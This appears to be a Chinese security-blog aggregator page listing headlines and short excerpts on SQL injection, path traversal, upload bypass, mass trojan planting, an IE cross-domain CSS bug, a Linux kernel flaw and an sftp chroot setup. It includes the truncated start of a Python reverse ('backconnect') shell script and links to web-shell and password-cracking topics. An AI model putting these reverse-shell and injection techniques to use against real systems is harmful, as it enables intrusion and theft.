暖月

• 暖月-Web应用安全文集
• SQL高级注入使用之储存过程
• 伪静态注入技术
• 浅析路径遍历漏洞
• 突破本地验证 继续上传
• 清理数据库批量挂马
• Oracle注入sys_context利用
• 常用的社工工具
• 绕过单引号继续注入
• 恭祝春节快乐

鬼仔

Error: Feed has a error or is not valid

幻影

• 使用sshd的ChrootDirectory参数实现安全的sftp服务100opensshd的4.8p1以上提供了ChrootDirectory的参数,通过该参数可以实现安全的sftp服务。 具体实现命令为: subsystem sftp internal-sftp Match user sftpuser ChrootDirectory /sftp/ X11Forwarding no AllowTcpForwarding no ForceCommand internal- …
• [SOBB-34]/[SOBB-35]发布100感谢xisigr牛和80vul-x马甲的支持！ [SOBB-34]是比较有意思，有兴趣的同学可以看一下。 其实这个应该算是一类漏洞，利用了ie的一个小特性，这个漏洞的原型来之于《HTML5 Security Cheatsheet》： XSS using accent grave when copying innerHTML (1)#59edit Internet Explorer treats t …
• VMware Workstation Unrecoverable Error: (vmx) NOT_IMPLEMENTED100昨天通宵开着机器，早上出门的时候着急，就非正常关机了，到公司才发现VMware无法启动，错误提示： 按照说明点了”Collect Support Data“毛用都没有，自己研究了一下，发现Vista下只要简单的用“管理员权限“启动一下VMware就好了。 类别：默认分类 查看评论 …
• [图]发一只极为可爱的小狗~~100类别：无聊一下 查看评论 …
• 最近墙很奇怪100陆续解封了https://bridges.torproject.org/ 和 https://hotfile.com/ 类别：网络安全 查看评论 …
• 倒霉的老张头100中产网络发帖员的老张头生了一个女儿，分别嫁到了常州、杭州和上海，按理说这是件幸福的事，因为凤凰越嫁越好，从三线城市飞到了二线城市再跳到一线城市安家了啊，但是烦恼来了，因为….他的女儿命不好，居然在三个地方遇到同样一个极品男。究竟老张头上辈子造了什么孽呢？为什么他的女儿逃不出极品男的魔爪呢？下次老张头的女儿会嫁到哪呢？如果出国会幸福吗？欢迎杭州6频道天天好运道前去采访报导探个究竟。杭州6频道，天 …
• 八卦一下最近那个linux kernel堆栈设计漏洞100看完LWN这篇文章， 终于知道这个内核漏洞的来龙去脉了。 自从kernel 2.6时代， 进程的堆栈和堆都是紧挨着的， 这样如果一个进程的stack全部用完后， 内核扩展堆栈的时候， 数据就会写入到相邻的堆区中（可以递归的调用某个函数试试）， 在这个可写的堆区中填入精心构造好的数据， 就能改成堆中的数据结构， 使其可以跳转到任意地址去执行代码， 利用这个内核漏洞很重要的一点就是要用x client …
• How-To-Exp-Me 之 CSS-String-Injection100不明白啥是“CSS-String-Injection”的同学，先看以下二位牛人的blog： 《又一强大的跨域漏洞》 《IE8 这个CSS cross domain bug 》 其实谈论的都是用一个问题，只是我觉得“CSS-String-Injection”的描述更有意思一些 ：）。其实这个问题源于： Carnegie Mellon Silicon Valley – Web Security Res …
• IE8 这个CSS cross domain bug100前两天出来了，今天看到茄子在玩。。。 http://www.packetstormsecurity.com/1009-advisories/ie8-forcedtweet.txt 也是很严重的一个漏洞，我们都知道同源策略限制脚本不能跨域读数据，用这个漏洞在IE8里就可以了。 POC: www.a.com/test.html: <body> {}body{fontFamily: aaaa …
• windows下python反弹脚本100方便以后查阅吧……，功能比较简单，没做容错处理，凑合看 #!/usr/bin/python import socket import sys import os def usage(): print "Simple Python Backconnect Shell" print "Usage:" print "./bc.py [ip] [port] …

Web手册

• Compilation of wordlist downloads
• 新版Any2Bat.vbs
• Adobe ColdFusion Directory Traversal Vulnerability
• Black Hat 2010 Token Kidnapping's Revenge
• darkc0de.com Archive
• China Chopper @ 20100629
• Reliable Weekly Exploit Database Updates
• [update]John the Ripper & hydra
• MYSQL高级注入实例
• Penetration Testing In The Real World